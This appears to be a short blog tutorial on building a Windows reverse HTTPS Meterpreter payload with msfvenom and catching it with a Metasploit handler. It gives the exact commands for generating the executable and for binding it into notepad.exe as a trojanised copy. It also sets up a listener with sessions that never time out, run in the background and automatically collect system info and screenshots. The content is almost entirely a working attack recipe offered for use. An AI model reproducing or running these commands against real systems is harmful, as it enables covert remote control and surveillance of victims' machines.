Simple Background HTTPS Reverse Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Msfvenom is the combination of payload generation and encoding.

msfvenom usage

Usage: /usr/bin/msfvenom [options] <var=val>
 
Options:
    -p, --payload           Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled            Prepend a nopsled of [length] size on to the payload
    -f, --format             Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder           The encoder to use
    -a, --arch                 The architecture to use
        --platform         The platform of the payload
        --help-platforms             List available platforms
    -s, --space              The maximum size of the resulting payload
        --encoder-space      The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars            The list of characters to avoid example: '\x00\xff'
    -i, --iterations          The number of times to encode the payload
    -c, --add-code             Specify an additional win32 shellcode file to include
    -x, --template             Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out                  Save the payload
    -v, --var-name             Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

Generate reverse https meterpreter payload

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe

Binding exe files

msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe

Run metasploit handler (server)

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST example.com
set LPORT 443

Session will never timeout

set SessionCommunicationTimeout 0

Execute commands on new session connection

set autorunscript multi_console_command -rc /root/script.rc

Don’t exit once the first meterpreter connection is established

set ExitOnSession false

Run all meterpreter connections in the background automatically

exploit -j

List sessions

sessions -l

Interact with a shell

sessions -i 5

Send interaction with session 5 to background
Press ctrl+z

script.rc contents

sysinfo
screenshot
%d bloggers like this: